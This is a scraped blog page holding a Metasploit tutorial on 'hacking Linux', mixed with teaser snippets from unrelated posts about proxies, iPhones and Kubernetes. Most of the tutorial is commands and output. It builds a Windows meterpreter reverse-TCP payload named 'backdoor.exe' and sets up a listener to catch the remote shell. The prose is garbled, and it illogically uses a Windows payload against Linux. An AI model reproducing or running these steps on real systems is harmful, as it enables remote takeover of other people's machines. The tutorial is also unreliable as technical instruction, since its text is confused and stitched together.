What Proxies Are For
When you cannot access certain sites or hide your identity, you need a tool for that. For example, the USA proxies are in demand among
Home / Blog / EH Security / How to Hack Linux -Metasploit Tutorial Backtrack 5 R1
Metasploit is a wonderful tool for penetration testing that contain a database of publicly known exploits for various operating system and software’s, we have discussed how to hack windows via metasploit on backtrack Linux but how to hack Linux (Ubuntu and any other Linux) via metasploit. Metasploit contain several exploits for Linux operating system too but we can windows exploit for Linux. This is the video tutorial in which I will show you how to hack a Linux operating system because in the penetration testing sometimes we need to get the root access on the server or computer.
root@bt:~# msfpayload windows/meterpreter/reverse_tcp lhost= lport=4444 X > backdoor.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {“lhost”=>””, “lport”=>”4444”}
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost
lhost =>
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit[*] Started reverse handler on
[*] Starting the payload handler…
Industrial Cybersecurity
September 28, 2023
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When you cannot access certain sites or hide your identity, you need a tool for that. For example, the USA proxies are in demand among
You might have heard that the iPhone is almost completely impossible to hack or that Samsung devices have some of the best firewalls in the
As with any technological component, security must be a primary consideration when managing a Kubernetes environment. Applications are constantly at the risk of compromising with
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